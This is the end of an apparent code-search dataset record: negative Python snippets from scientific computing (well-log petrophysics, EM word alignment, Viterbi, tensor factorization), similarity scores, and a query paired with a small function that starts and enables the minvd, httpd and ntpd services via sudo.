of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial 
Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def test_superposition_ud_cnot():\n program = dedent(\n \"\"\"\\\n register q0[0]\n register q1[1]\n H q1\n CNOT q1 q0\n \"\"\"\n )\n\n result = run(program, run_gate_array, return_distribution=True)\n assert isclose(result, [0.5, 0.0, 0.0, 0.5]).all()", "def em_step(t, eng, fre):\n # TODO\n # Lecture Steps:\n # 1. Make a table of P(f|e) for all possible pairs of f and e, prob_tab\n # 2. Make a grid where each sentence pair is a row and each possible\n # alignment is a column\n # 3. For each sentence pair and alignment compute P(F|a,E)\n # Given aligned words f1,f2,...,fn and e1,e2,...,en in the pair:\n # P(F|a,E) = prob_tab[f1][e1] * ... * prob_tab[fn][en]\n # 4. For each sentence pair and alignment\n # divide P(F|a,E) by the sum of the P(F|a,E)'s in the row\n # this is P(a|E,F)\n # 5. For each possible word pair e and f, sum P(a|E,F) across all\n # alignments and sentence pairs for each instance that e is aligned\n # with f, this gets out a TCount table\n # 6. Sum over the rows of TCount to get the total estimates for each\n # english word e.\n # 7. Compute P(f|e) = TCount[f][e] / Total[e]\n # This is the model after 1 iteration.\n\n '''\n Tutorial Steps:\n initialize P(f|e)\n for a number of iterations:\n set tcount(f, e) to 0 for all f, e\n set total(e) to 0 for all e\n for each sentence pair (F, E) in training corpus:\n for each unique word f in F:\n denom_c = 0\n for each unique word e in E:\n denom_c += P(f|e) * F.count(f)\n for each unique word e in E:\n tcount(f, e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n total(e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n for each e in domain(total(:)):\n for each f in domain(tcount(:,e)):\n P(f|e) = tcount(f, e) / total(e)\n '''\n\n '''\n My Pseudocode:\n The Table of P(f|e) is already initiated as the AM dictionary.\n Presumably the AM is passed in as t.\n Initialize TCount as a dictionary like AM, e.g. 
TCount[e][f] = 0\n Initialize Total as a dictionary with the same entries as TCount[e] = 0\n for i in range(0,len(eng)):\n\n '''\n AM = dict.fromkeys(t.keys(), 0)\n Total = dict.fromkeys(t.keys(), 0)\n TCount = dict.fromkeys(t.keys(), 0)\n for key in TCount.keys():\n TCount[key] = dict.fromkeys(t[key].keys(), 0)\n AM[key] = dict.fromkeys(t[key].keys(), 0)\n\n num_sentences = min(len(eng), len(fre))\n for i in range(0, num_sentences):\n E = eng[i]\n F = fre[i]\n E_uniques = list(set(E))\n F_uniques = list(set(F))\n for f in F_uniques:\n denom_c = 0\n for e in E_uniques:\n denom_c += t[e][f] * F.count(f)\n for e in E_uniques:\n TCount[e][f] += t[e][f] * F.count(f) * E.count(e) / denom_c\n Total[e] += t[e][f] * F.count(f) * E.count(e) / denom_c\n for e in Total.keys():\n for f in TCount[e].keys():\n AM[e][f] = TCount[e][f] / Total[e]\n\n return AM", "def test_nr_trinuc(self):\n preds = [\n MotifChange(\"A\", \"C\"),\n MotifChange(\"G\", \"A\"),\n MotifChange(\"CGA\", \"TGA\"),\n ]\n sm = substitution_model.TimeReversibleTrinucleotide(predicates=preds)\n got = sm.get_param_list()\n self.assertEqual(got, [\"A/C\", \"G/A\", \"CGA/TGA\"])\n self.assertEqual(len(sm.get_motifs()), 64)", "def event_m20_11_4000000():\n \"\"\"State 0,2: [Lib] Character: Petrified: Key Guide_SubState\"\"\"\n assert event_m20_11_x37(z94=5300, z95=0, z96=15, z97=211000030, z98=0, z99=1600, z100=6, z101=4000010)\n \"\"\"State 1: Finish\"\"\"\n EndMachine()", "def ec_matrix_vector(p0, T, n): \n if(n<=0):\n EC=np.zeros(T.shape)\n return EC\n else:\n \"\"\"Probability vector after (k=0) propagations\"\"\" \n p_k=1.0*p0\n \"\"\"Sum of vectors after (k=0) propagations\"\"\"\n p_sum=1.0*p_k \n for k in xrange(n-1):\n \"\"\"Propagate one step p_{k} -> p_{k+1}\"\"\"\n p_k=np.dot(p_k,T) \n \"\"\"Update sum\"\"\"\n p_sum+=p_k \n \"\"\"Expected counts\"\"\"\n EC=p_sum[:,np.newaxis]*T \n return EC", "def p(e, t):\n return b * e ** 2", "def binary_dec(A,n_iter = 1000):\n\n\t### Initialization ###\n\n\tp, q = np.shape(A)\n\t### B : to be changed\n\tB = np.eye(p)\n \t###\n\tC = bin_random_mat(p,q)\n\tlist_dist = []\n\tB_argmin = B\n\tC_argmin = C\n\n\n\n\n\t## temperature ##\n\tT_n = np.log(np.arange(2,n_iter+2,1))\n\t#T_n = np.arange(2,n_iter+2,1)\n\tfor i in range(n_iter):\n\t## update ##\n\t\tC_0 = np.matrix(C)\n\t\tlist_dist =np.append( list_dist, V_potential(np.dot(B,C_0),A) )\n\t\tif V_potential(np.dot(B_argmin,C_argmin),A) == 0:\n\t\t\tbreak\n\t########## transition #############\n\t# Here we take 2 steps independent(for B and for C respectively)\n\t# We could also use metropolis hasting kernel.\n\n\t\tC_iter = np.matrix(Metropolis_transition_C(C))\n\t\n\n\t\tB_iter = B[np.random.permutation(np.arange(p))]\n\t\t\n\t\tif np.random.uniform(0,1,1) < \\\n\t\t\t\tnp.exp(-1./T_n[i]*( V_potential(np.dot(B_iter,C_iter), A)\\\n\t\t\t\t - V_potential(np.dot(B,C_0),A) ) ):\n\t\t\tC = C_iter\n\t\t\tB = B_iter\n\t######### end of transition ##############\n\n\t\t\tif V_potential(np.dot(B,C),A) < np.min(list_dist):\n\t\t\t\t\n\t\t\t\tB_argmin = B\n\t\t\t\tC_argmin = np.matrix(C)\n\t\t\t# print i+1\n\t\t\t# print V_potential(np.dot(B_argmin,C_argmin),A)\n\t\t\t# print C_argmin\n\t\t\t# print '\\n'\n\n\treturn list_dist,B_argmin, C_argmin", "def test_uneven_sw():\n B = 100\n t = 1\n H = 30\n E = 20000\n sections = ((2 * B, t, 0, E), (B, t, H - t, E))\n EI, top, bot = bm.EI(sections, E)\n assert 1.95 < abs(bot) / top < 1.96", "def trc_fgen_prefb(self,trc,dt,nspad=200,hwin=150,vlen=51):\n output=np.zeros((len(trc),((11*(vlen))+1)))\n 
pad=np.random.rand(nspad)/100\n trc_norm=trc/np.amax(np.abs(trc))\n trc_norm_padded=np.hstack((pad,trc_norm))\n trc_entropy=self.entropy(trc_norm_padded,50)\n trc_fdm=self.fdm(trc_norm_padded,50,np.arange(1,4),15)\n trc_slta=trigger.classic_sta_lta(trc_norm_padded,2,100)\n trc_fq_win_sum=self.fq_win_sum(trc_norm_padded,hwin,dt)\n hwin2=50\n trc_kurtosis_skew=self.kurtosis_skewness(trc_norm_padded,hwin2)\n for i,j in enumerate(trc):\n ftrc=[]\n fb=i*dt\n ftrc=np.append(ftrc,trc_norm_padded[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(np.gradient(np.abs(trc_norm_padded)))[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(trc_entropy)[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(np.gradient(trc_entropy))[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1]) \n ftrc=np.append(ftrc,self.norm(trc_fdm)[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(np.gradient(trc_fdm))[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1]) \n ftrc=np.append(ftrc,self.norm(trc_slta)[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(trc_fq_win_sum)[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(np.gradient(trc_fq_win_sum))[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(trc_kurtosis_skew[0])[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(trc_kurtosis_skew[1])[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,1)\n output[i,:]=ftrc\n return output", "def expected_counts(p0, T, n): \n M=T.shape[0]\n if n<=M:\n return ec_matrix_vector(p0, T, n)\n else:\n return ec_geometric_series(p0, T, n)", "def condition_tpm(self,tpm, fixed_nodes, state):\n conditioning_indices = [[slice(None)]] * len(state)\n for i in fixed_nodes:\n # Preserve singleton dimensions with `np.newaxis`\n conditioning_indices[i] = [state[i], np.newaxis]\n # Flatten the indices.\n conditioning_indices = list(chain.from_iterable(conditioning_indices))\n # Obtain the actual conditioned TPM by indexing with the conditioning\n # indices.\n return tpm[tuple(conditioning_indices)]", "def solve_LF(self):\n self.u = zeros(self.N)\n self.u[0] = self.u0\n self.u[1] = self.u1\n u = self.u\n f= self.f\n dt = self.dt\n t = self.t\n N = self.N\n for n in xrange(1,N-1):\n u[n+1] = 2*dt*f(u[n],t[n]) + u[n-1]\n #return t,u", "def test_LM(self):\n\t\t\n\t\tprecision = 10**-8\n\t\t\t\t \n\t\tif self.n == 1:\n\t\t\t\t \n\t\t\tP_sum = sum(self.estimate_prob('', w) for w in self.vocab)\n\t\t\t\n\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one.'\n\t\t\t\t \n\t\telif self.n == 2:\n\t\t\thistories = ['the', 'in', 'at', 'blue', 'white']\n\t\t\t\t \n\t\t\tfor h in histories:\n\t\t\t\t \n\t\t\t\tP_sum = sum(self.estimate_prob(h, w) for w in self.vocab)\n\t\t\t\t\n\t\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one for history' + h\n\t\t\t\t\t \n\t\tprint('TEST SUCCESSFUL!')", "def prove_NA1() -> Proof:\n # Optional Task 6.9a", "def skip_test(n):\n return k > 0 and magic * n * k**0.5 >= t4_ref", "def set_T_lm(self):\n self.delta_T_lm_array = ( ((self.exh.T_outlet_array -\n self.cool.T_inlet_array) - (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) / np.log((self.exh.T_outlet_array -\n self.cool.T_inlet_array) / (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) )", "def solveForModeB1(X, M, n, maxInner, 
epsilon, tol,sita,Y1, lambta2):\n # Pi(n) = [A(N) kr A(N-1) kr ... A(n+1) kr A(n-1) kr .. A(1)]^T\n Pi = tensorTools.calculatePi(X, M, n)\n #print 'Pi size', Pi.shape\n #print 'pi='+str(Pi)\n #print(M.U[n])\n for iter in range(maxInner):\n # Phi = (X(n) elem-div (B Pi)) Pi^T\n #print X.vals.shape,X.shape\n #print X.vals.flatten().shape\n Phi = tensorTools.calculatePhi(X, M.U[n], Pi, n, epsilon=epsilon)\n #print('phi'+str(Phi))\n #print(Phi)\n # check for convergence that min(B(n), E - Phi(n)) = 0 [or close]\n kktModeViolation = np.max(np.abs(np.minimum(M.U[n], 1-Phi).flatten()))\n if (kktModeViolation < tol):\n break\n\n B=M.U[n]\n #print B.shape\n colNorm = np.apply_along_axis(np.linalg.norm, 0, B, 1)\n zeroNorm = np.where(colNorm == 0)[0]\n colNorm[zeroNorm] = 1\n B = B / colNorm[np.newaxis, :]\n tm=np.hstack((np.ones((B.shape[0],1)),B))\n Y1=Y1.reshape((Y1.shape[0],1))\n\n derive=-1.0*lambta2/B.shape[0]*np.dot((Y1-np.dot(tm,sita)),sita.T)\n #print derive.shape\n #print np.multiply(M.U[n],derive[:,1:]).shape\n #print np.multiply(M.U[n],Phi).shape\n M.U[n] = np.array(np.multiply(M.U[n],Phi))-np.array((np.multiply(M.U[n],derive[:,1:])))\n\n #print 'after'\n #print M.U[n][0]\n #print(\" Mode={0}, Inner Iter={1}, KKT violation={2}\".format(n, iter, kktModeViolation))\n return M, Phi, iter, kktModeViolation", "def __v(pk: float, pna: float, pcl: float, pca: float) -> float:\n ex_ion = pk * ex_k + pna * ex_na + pcl * in_cl + pca * ex_ca\n in_ion = pk * in_k + pna * in_na + pcl * ex_cl + pca * in_ca\n v = r * t / f * np.log(ex_ion/in_ion) * 1000\n return v", "def __init__(self, sim, A_phi, V0_frac, t, Ndec_response=4):\n self.A0 = A_phi[0]\n self.phi0 = A_phi[1]\n self.sim = sim\n self.V0_frac = V0_frac\n self.t = t\n self.x_eq0 = self.sim.x_eq([0,0, V0_frac*self.sim.V(t[0])*self.sim.C], t[0]) # Given the initial charge...\n self.sol = integrate.odeint(sim, self.x0, t=t)\n self.z = sim.zLI(self.sol, t)\n self.phi = np.unwrap(np.angle(self.z))\n self.t_filt = t_filt = t[15:] \n self.i0 = i0 = np.argmin(abs(self.t_filt)) \n self.ip = ip = np.argmin(abs(self.t_filt-self.sim.V.tp))\n self.phi_filt = phi_filt = np.convolve(self.phi, np.ones(16)/16.0, 'valid') # Dependent on using 16 samples / period\n self.df_filt = df_filt = np.gradient(self.phi_filt)/np.gradient(self.t_filt)\n self.t_wide = t_filt[::Ndec_response]\n self.respRePts = self.sim.responseReVec(self.t_wide)\n self.Ht = lambda t: np.interp(t, self.t_wide, self.respRePts)\n \n \n \n self.dphi_act = (phi_filt[ip] - phi_filt[i0])/ (2*np.pi)*1000\n self.phi_filt_mcyc = (phi_filt - phi_filt[0])*1e3/(2*np.pi)\n self.phi_est, self.dphi_est = estimate_dphi(self.df_python, self.i0, self.ip)\n self.error = (self.dphi_est - self.dphi_act)/self.dphi_act", "def viterbi(self):\n # initialisation\n self.phi = zeros((self.noOfEmmittingStates+2, self.T + 1))\n self.phi[0,0] = 1.0\n for i in range(1,self.noOfEmmittingStates+2):\n self.phi[i,0] = 0.0\n for t in range(1,self.T+1):\n self.phi[0,t] = 0.0\n self.traceback = zeros((self.noOfEmmittingStates+1, self.T+1))\n\n # main recursion\n for t in range(1, self.T + 1):\n for j in range(1, self.noOfEmmittingStates + 1):\n phiTemp = zeros((self.noOfEmmittingStates + 1, 1))\n for k in range(self.noOfEmmittingStates+1):\n phiTemp[k,0] = self.phi[k,t-1] * self.transitionMatrix[k, j-1]\n self.traceback[j-1,t-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[j, t] = phiTemp.max(0) * self.b[j-1, t-1]\n\n # last column - set states which can't reach term to 0, sub for term\n for j in 
range(1,self.noOfEmmittingStates + 1):\n if self.transitionMatrix[j,-1] == 0:\n self.phi[j,-1] = 0\n phiTemp = zeros((self.noOfEmmittingStates+1, 1))\n for k in range(self.noOfEmmittingStates + 1):\n phiTemp[k,0] = self.phi[k,-1] * self.transitionMatrix[k,-1]\n self.traceback[-1,-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[-1,-1] = phiTemp.max(0)", "async def _design_lvl_shift_internal_inv(self, pseg: int, nseg: int, out_inv_m: int,\n fanout: float,\n pinfo: Any, tbm_specs: Dict[str, Any], is_ctrl: bool,\n has_rst: bool, dual_output: bool,\n vin: str, vout: str) -> Tuple[int, int]:\n if is_ctrl: # size with fanout\n inv_nseg = int(np.round(nseg / fanout))\n inv_nseg = 1 if inv_nseg == 0 else inv_nseg\n inv_pseg = int(np.round(pseg / fanout))\n inv_pseg = 1 if inv_pseg == 0 else inv_pseg\n self.log(f\"Calculated inv to need nseg : {inv_nseg}\")\n self.log(f\"Calculated inv to need pseg : {inv_pseg}\")\n return inv_pseg, inv_nseg\n\n # First size the NMOS in the inverter assuming a reasonably sized PMOS\n inv_nseg = await self._design_lvl_shift_inv_pdn(pseg, nseg, out_inv_m, fanout, pinfo,\n tbm_specs, has_rst, dual_output, vin, vout)\n self.log(f\"Calculated inv to need at least nseg: {inv_nseg}\")\n\n # Now using the inverter pull down size, we size the inverter pull up PMOS\n inv_pseg, inv_nseg = await self._design_lvl_shift_inv_pun(pseg, nseg, inv_nseg, out_inv_m,\n fanout, pinfo,\n tbm_specs, has_rst, dual_output,\n vin, vout)\n self.log(f\"Calculated inv to need pseg: {inv_pseg} and nseg: {inv_nseg}\")\n return inv_pseg, inv_nseg", "def __init__(self, prim):\n self.actual = prim" ]
[ "0.5975354", "0.574612", "0.57286537", "0.5664337", "0.5646467", "0.5617162", "0.55988216", "0.55463326", "0.5473999", "0.5429033", "0.54245466", "0.54071516", "0.5387508", "0.5321748", "0.5301005", "0.5291172", "0.52895296", "0.5283824", "0.52834505", "0.52806515", "0.52792656", "0.5278463", "0.5276896", "0.5251637", "0.52331257", "0.5230351", "0.5220327", "0.5204915", "0.5203323", "0.51958525", "0.5187786", "0.51758975", "0.5168969", "0.5166589", "0.516177", "0.51508445", "0.5149464", "0.5147386", "0.5143932", "0.5135058", "0.51350117", "0.5134513", "0.5129724", "0.51290935", "0.5128879", "0.51184404", "0.5118359", "0.5116704", "0.51052344", "0.50946945", "0.5090614", "0.50796664", "0.5076155", "0.5071514", "0.5065052", "0.5064351", "0.50641894", "0.5059437", "0.5058119", "0.50545436", "0.50532484", "0.50495374", "0.5047005", "0.50444216", "0.503394", "0.5033133", "0.50300616", "0.5026538", "0.5020028", "0.5019024", "0.5009851", "0.50082016", "0.500663", "0.5004525", "0.49976382", "0.4994871", "0.49944523", "0.4994181", "0.4993715", "0.4985531", "0.4977474", "0.497716", "0.49746075", "0.4970822", "0.49581137", "0.49565706", "0.49532133", "0.4952891", "0.49523658", "0.4948384", "0.49453053", "0.49451953", "0.49428967", "0.49405053", "0.49392045", "0.4934651", "0.49346322", "0.49312845", "0.49287593", "0.49266976", "0.49229872" ]
0.0
-1
Implementation of TPMINVNOM00000 Step 1.5
def run_services():
    for service in ("minvd", "httpd", "ntpd"):
        sudo("service %s start" % service)
        sudo("chkconfig %s on" % service)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTru(n,int_method,func) :\n m = np.asarray([0.5,1,1.5,2,2.5,3,3.5,4,4.5,5,6,7,8,9,10])\n bes = np.asarray([-0.5,0,0.43675,0.47773,0.49231,0.49316,0.49280,0.50325,\n 0.51140,0.52169,0.55823,0.58086,0.60463,0.61483,0.66995])\n p = np.asarray([1,0,0.61007,0.77491,0.84071,0.87689,0.89914,0.91365,\n 0.92449,0.93279,0.94451,0.95289,0.95904,0.96385,\n 0.96731])\n h1 = np.asarray([0,0,-0.07257,-0.04963,-0.03313,-0.02282,-0.01648,\n -0.01248,-0.00970,-0.00773,-0.00522,-0.00369,-0.00272,\n -0.00206,-0.00164])\n h2 = np.asarray([0,0,-0.20048,-0.15556,-0.12070,-0.09611,-0.07919,\n -0.06747,-0.05829,-0.05106,-0.04060,-0.03311,-0.02768,\n -0.02353,-0.02053])\n h3 = np.asarray([0,0,0.01647,0.08284,0.14390,0.19680,0.24168,0.27969,\n 0.31280,0.34181,0.39002,0.42942,0.46208,0.48997,0.51325])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h1,int_h2,int_h3])", "def ftlan_E1c(hop, v0, T, m=50, Min_b=10e-10, Min_m=5, kB=1, norm = np.linalg.norm):\n# def Tri_diag(a1, b1):\n# mat = np.diag(b1, -1) + np.diag(a1, 0) + np.diag(b1, 1)\n# e, w = np.linalg.eigh(mat)\n# return e, w\n\n beta = 1./(T * kB)\n E = 0.\n a, b = [], []\n v0 = v0/norm(v0)\n Hv = hop(v0)\n a.append(v0.dot(Hv))\n v1 = Hv - a[0] * v0\n b.append(norm(v1))\n if b[0] < Min_b:\n return 0\n\n v1 = v1/b[0]\n Hv = hop(v1)\n a.append(v1.dot(Hv))\n\n for i in range(1, m - 1):\n v2 = Hv - b[i - 1] * v0 - a[i] * v1\n b.append(norm(v2))\n if abs(b[i]) < Min_b:\n b.pop()\n break\n\n v2 = v2/b[i]\n Hv = hop(v2)\n a.append(v2.dot(Hv))\n v0 = v1.copy()\n v1 = v2.copy()\n \n a = np.asarray(a)\n b = np.asarray(b)\n\n eps, phi = Tri_diag(a, b)\n l = len(eps)\n# Eo = eps[0]\n# eps = eps-Eo\n exp_eps = np.exp(-beta * eps)\n E = np.sum(exp_eps * eps * phi[0, :]**2.)\n Z = np.sum(exp_eps * phi[0, :]**2.)\n# for i in range(len(eps)):\n# E += exp_eps[i] * eps[i] * phi[0, i]**2\n\n# E = E + Eo\n# de = eps[:, np.newaxis] - eps\n# for i in range(l):\n# E += eps[i] * phi[0, i]**2./np.sum(np.exp(-beta*de[:l, i])*(phi[0, :l]**2.))\n return E, Z", "def TR_algo3(h, vd=2):\n ve = 0\n vd = 2\n p = [0]*N\n for i in range(M-1, -1, -1):\n w = [bit_component(h, i*N+ii) for ii in range(N)]\n #print(i, w)\n w = sum( [wx*2**j for j, wx in enumerate(w)] )\n #print(i, w, gc(w))\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(N):\n p[j] += bit_component(l, j) << i\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % N\n return p", "def tpm3_1_8_end_genomic():\n return \"TPM3\", \"NC_000001.11\", 154170399, 154170469, -1", "def prove_NN() -> Proof:\n # Optional Task 6.7c", "def prove_NI() -> Proof:\n # Optional Task 6.7e", "def stepFunction(Hin, m):\n if makeReport:\n reporter.addHeader2(\"stepFunction(%s,%s)\"%(hex(Hin), hex(m)))\n # step1. 
generating keys\n C2 = 0\n C3 = 0xff00ffff000000ffff0000ff00ffff0000ff00ff00ff00ffff00ff00ff00ff00\n C4 = 0\n U = Hin\n V = m\n W = U ^ V\n K1 = transformP(W)\n\n U = transformA(U)^C2\n V = transformA(transformA(V))\n W = U ^ V\n K2 = transformP(W)\n\n U = transformA(U)^C3\n V = transformA(transformA(V))\n W = U ^ V\n K3 = transformP(W)\n\n U = transformA(U)^C4\n V = transformA(transformA(V))\n W = U ^ V\n K4 = transformP(W)\n\n if makeReport:\n reporter.addBold(\"Generated keys:\")\n reporter.addList([hex(K1), hex(K2), hex(K3), hex(K4)])\n\n # step2. crypting tranformation\n Hin_cut = Hin # we need Hin for the next step, but this step cuts Hin\n h1 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h2 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h3 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h4 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n s1 = gost28147.cryptBlock(h1, K1)\n s2 = gost28147.cryptBlock(h2, K2)\n s3 = gost28147.cryptBlock(h3, K3)\n s4 = gost28147.cryptBlock(h4, K4)\n S = s4\n S = cryptBlocks.concat(S, s3, 64)\n S = cryptBlocks.concat(S, s2, 64)\n S = cryptBlocks.concat(S, s1, 64)\n if makeReport:\n reporter.addBold(\"Crypting transformation:\")\n reporter.addList([\n \"gost28147(%s,%s)=%s\"%(hex(h1),hex(K1),hex(s1)),\n \"gost28147(%s,%s)=%s\"%(hex(h2),hex(K2),hex(s2)),\n \"gost28147(%s,%s)=%s\"%(hex(h3),hex(K3),hex(s3)),\n \"gost28147(%s,%s)=%s\"%(hex(h4),hex(K4),hex(s4)),\n ])\n reporter.addBold(\"S=\"+hex(S))\n # Step 3. Shuffle transforming.\n Hout = transformPsi(S)\n for i in range(12):\n Hout = transformPsi(Hout)\n Hout = transformPsi(Hout ^ m)^Hin\n for i in range(61):\n Hout = transformPsi(Hout)\n return Hout", "def ER_Theory(N,Kappa) :\n\tMu2 = Kappa - ( 2*Kappa*(1.0 - (Kappa/N))*math.log(N) )**0.5 + (( (Kappa*(1.0 - (Kappa/N)))/math.log(N) )**0.5)*( math.log( (2*math.pi*math.log((N**2)/(2*math.pi))) ) - 0.5772)\n\treturn Mu2", "def cond_depend_tpm():\n # fmt: off\n tpm = np.array([\n [1.0, 0.0, 0.0, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.0, 0.0, 1.0],\n ])\n # fmt: on\n return tpm", "def N_TB_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. 
#self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result *= self.F_TB(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TB_EE.__func__, \"integ\"):\n self.N_TB_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TB_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TB_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_sw2():\n B1 = 100\n B2 = 200\n h = 18\n t = 1\n H = h + 2 * t\n E1 = 20000\n E2 = 10000\n sections = ((B1, t, 0, E1), (B2, t, h + t, E2))\n EI, top, bot = bm.EI(sections, E1)\n EIc = E1 * B1 * (H ** 3 - h ** 3) / 12\n assert 0.99 < EI / EIc < 1.01", "def N_TT_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_EB.__func__, \"integ\"):\n self.N_TT_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_EB.integ(integrand, nitn=8, neval=1000)\n result = 